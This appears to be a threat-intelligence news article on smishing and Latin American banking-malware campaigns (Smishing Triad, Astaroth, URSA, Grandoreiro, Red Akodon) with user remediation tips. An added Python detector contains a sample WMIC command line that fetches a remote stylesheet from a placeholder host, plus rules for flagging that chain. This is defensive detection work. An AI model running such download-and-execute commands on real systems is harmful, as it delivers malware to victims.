Grandoreiro Banking Trojan Hits Brazil as Smishing Scams Surge in Pakistan

Pakistan has recently become the latest target of the Smishing Triad, a cyber threat actor, marking its first expansion beyond the E.U., Saudi Arabia, the U.A.E., and the U.S. According to a report by Resecurity, published earlier this week, the group’s latest tactic involves sending malicious messages that appear to be from Pakistan Post to customers of mobile carriers via iMessage and SMS. These messages aim to steal personal and financial information. The threat actors, believed to be Chinese-speaking, utilize stolen databases available on the dark web to send these fraudulent SMS messages. They entice recipients by claiming there is a failed package delivery and prompting them to click on a link to update their address. This deceptive strategy is designed to trick individuals into revealing sensitive information, which can then be exploited for malicious purposes. The Smishing Triad’s expansion to Pakistan highlights the increasing sophistication and global reach of cybercriminals. By using legitimate communication channels, such as postal services, the group seeks to gain the trust of unsuspecting victims. The stolen personal and financial data can result in significant financial loss and privacy breaches for those affected. This development underscores the critical need for vigilance, cybersecurity awareness among users, and robust security measures by organizations to guard against such threats.

ATTACK OVERVIEW:

Users who click on the URLs are redirected to fake websites that ask for their financial information under the guise of a service fee for redelivery. Resecurity reported that besides Pakistan Post, the Smishing Triad was also detected orchestrating multiple fake delivery package scams. These scams primarily targeted individuals expecting legitimate packages from reputable courier services such as TCS, Leopard, and FedEx. Meanwhile, Google has disclosed details about another threat actor, dubbed PINEAPPLE, which uses tax- and finance-themed lures in spam messages to target Brazilian users. These messages entice users to open malicious links or files, leading to the deployment of the Astaroth (also known as Guildma) information-stealing malware. According to Google's Mandiant and Threat Analysis Group (TAG), PINEAPPLE often abuses legitimate cloud services to distribute malware to users in Brazil. The group has experimented with various cloud platforms, including Google Cloud, Amazon AWS, and Microsoft Azure, among others. This underscores the increasing sophistication of cyber threats and the widespread abuse of trusted services to deceive users and propagate malware. The use of fake delivery notifications and finance-themed lures demonstrates the diverse tactics employed by these threat actors to obtain sensitive information and compromise user security. As these cyber threats evolve, it is crucial for users to remain vigilant and for organizations to implement robust cybersecurity measures to protect against such malicious activities.

ASTAROTH MALWARE:

Astaroth is an information stealer: it exfiltrates confidential and sensitive data from an infected victim, such as account IDs and passwords, keystrokes, and other data, to the attacker. It runs largely in the memory of infected computers. It also abuses legitimate system binaries such as WMIC, the command-line interface to Windows Management Instrumentation, to download and execute malware payloads silently in the background. It's worth noting that the abuse of Google Cloud Run to disseminate Astaroth was flagged by Cisco Talos earlier this February, which described it as a high-volume malware distribution campaign targeting users across Latin America (LATAM) and Europe. The internet goliath said it also observed a Brazil-based threat cluster it tracks as UNC5176 targeting the financial services, healthcare, retail, and hospitality sectors with a backdoor codenamed URSA that can siphon login credentials for various banks, cryptocurrency websites, and email clients. The attacks leverage emails and malvertising campaigns as distribution vectors for a ZIP file containing an HTML Application (HTA) file that, when opened, drops a Visual Basic Script (VBS) responsible for contacting a remote server and fetching a second-stage VBS file. The downloaded VBS file then carries out a series of anti-sandbox and anti-VM checks, after which it contacts a command-and-control (C2) server to retrieve and execute the URSA payload.
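As an added illustration (not code from the article, Google, or Cisco Talos), the following Python detector runs the process-chain indicators from the paragraph above (WMIC reaching out to a remote URL, an HTA host spawning a script host, a script host handing off to WMIC) over constructed Sysmon-style process-creation records. The field names, rule names and sample command lines are assumptions made for this example, not real telemetry from these campaigns.

```python
import json
import re

# Constructed process-creation records (JSON lines, simplified Sysmon-style fields).
# Written for this example only; the hosts, paths and URLs are placeholders.
SAMPLE_EVENTS = r"""
{"ts": "2024-07-23T10:01:02Z", "parent": "explorer.exe", "image": "mshta.exe", "cmd": "mshta.exe C:\\Users\\u\\Downloads\\Fatura.hta"}
{"ts": "2024-07-23T10:01:03Z", "parent": "mshta.exe", "image": "wscript.exe", "cmd": "wscript.exe //B C:\\Users\\u\\AppData\\Local\\Temp\\stage1.vbs"}
{"ts": "2024-07-23T10:01:09Z", "parent": "wscript.exe", "image": "wmic.exe", "cmd": "wmic.exe os get /format:\"http://example.invalid/stage2.xsl\""}
{"ts": "2024-07-23T10:05:00Z", "parent": "cmd.exe", "image": "wmic.exe", "cmd": "wmic.exe os get caption,version"}
{"ts": "2024-07-23T10:06:00Z", "parent": "explorer.exe", "image": "C:\\Windows\\System32\\wscript.exe", "cmd": "wscript.exe C:\\Scripts\\logon.vbs"}
"""

URL_RE = re.compile(r"https?://", re.IGNORECASE)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}


def basename(path: str) -> str:
    """Reduce a full Windows image path to its lower-cased file name."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> list:
    """Return the names of every rule the event matches (empty list if benign)."""
    image, parent, cmd = basename(event["image"]), basename(event["parent"]), event["cmd"]
    hits = []
    # Rule 1: WMIC given a remote URL, the download-and-execute abuse described above.
    if image == "wmic.exe" and URL_RE.search(cmd):
        hits.append("wmic_remote_payload")
    # Rule 2: an HTA host launching a script host, the HTA -> VBS step of the URSA chain.
    if parent == "mshta.exe" and image in SCRIPT_HOSTS:
        hits.append("hta_spawns_script_host")
    # Rule 3: a script host launching WMIC, a dropped VBS handing off to a LOLBin.
    if parent in SCRIPT_HOSTS and image == "wmic.exe":
        hits.append("script_host_spawns_wmic")
    return hits


def detect(jsonl: str) -> list:
    """Scan JSON-lines telemetry and return (timestamp, rule) pairs for every match."""
    findings = []
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        findings.extend((event["ts"], rule) for rule in classify(event))
    return findings


if __name__ == "__main__":
    for ts, rule in detect(SAMPLE_EVENTS):
        print(ts, rule)
```

Plain `wmic os get caption,version` from a shell and a logon script run from Explorer produce no findings, which is the intended distinction between routine administration and the staged chain.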

GRANDOREIRO BANKING TROJAN:

Grandoreiro malware is introduced through phishing emails impersonating recognized organizations such as courts or telecom and energy companies. Once installed, the malware tracks keyboard inputs, simulates mouse activity, shares screens, and displays deceptive pop-ups, collecting data such as usernames, operating system information, device runtime and, most importantly, bank identifiers. With full control over victims' bank accounts, criminals empty them, sending funds through a money mule network to launder the illicit proceeds before transferring the funds to Brazil. The organization behind the malware is thought to have defrauded victims of more than EUR 3.5 million; however, according to CaixaBank, several failed attempts could have yielded more than EUR 110 million for the criminal organization. A third Latin America-based financially motivated actor spotlighted by Google is FLUXROOT, which is linked to the distribution of the Grandoreiro banking Trojan. The company said it took down phishing pages hosted by the adversary in 2023 on Google Cloud that posed as Mercado Pago with the goal of stealing users' credentials and personal information. "More recently, FLUXROOT has continued distribution of Grandoreiro, using cloud services such as Azure and Dropbox to serve the malware," it said. The disclosure follows the emergence of a new threat actor dubbed Red Akodon that has been spotted propagating various remote access trojans such as AsyncRAT, Quasar RAT, Remcos RAT, and XWorm through phishing messages designed to harvest bank account details, email accounts, and other credentials.

TARGET OF THE CAMPAIGN:

Targets of the campaign, which has been ongoing since April 2024 in Colombia, include:

  • Government organizations
  • Health organizations
  • Education organizations
  • Financial, manufacturing, food, services, and transportation industries

“Red Akodon’s initial access vector occurs mainly using phishing emails, which are used as a pretext for alleged lawsuits and judicial summonses, apparently coming from Colombian institutions such as the Fiscalía General de la Nación and Juzgado 06 civil del circuito de Bogotá,” Mexican cybersecurity firm Scitum said.

REMEDIATION STEPS:

  1. Do not respond: Even prompts to reply, such as texting "STOP" to unsubscribe, can be a trick to identify active phone numbers. Attackers depend on your curiosity or anxiety over the situation at hand, but you can refuse to engage or interact.
  2. Slow down if a message is urgent: Treat urgent account updates and limited-time offers as warning signs of possible smishing. Remain cautious and alert, and proceed carefully.
  3. Check the phone number: Odd-looking phone numbers, such as 4-digit ones, can be evidence of email-to-text services. This is one of many tactics a scammer can use to mask their true phone number.
  4. Avoid using any links or contact info in the message: Do not use links or contact details from messages that make you uncomfortable. Go directly to official contact channels when you can.
  5. Do not click on videos on suspicious websites: Such videos can carry malware and often use a crisis such as COVID-19 as a lure. Avoiding them reduces the risk of infecting your computer with Trojans or other malware.
  6. Do not trust or download attachments and URLs sent by an unknown user: An unknown sender, who may be an attacker or a potential threat actor, might use an email subject such as "URGENT. Do it now!" That alone is a sign the email is suspicious. Do not open the email unless you are certain it is legitimate. When in doubt, contact the supposed sender through a different channel and confirm whether it is legitimate.
  7. Keep all software systems up to date and install required patches: Doing this keeps the user's PC properly maintained and up to date, and is effective against Trojans and other malware that exploit known vulnerabilities.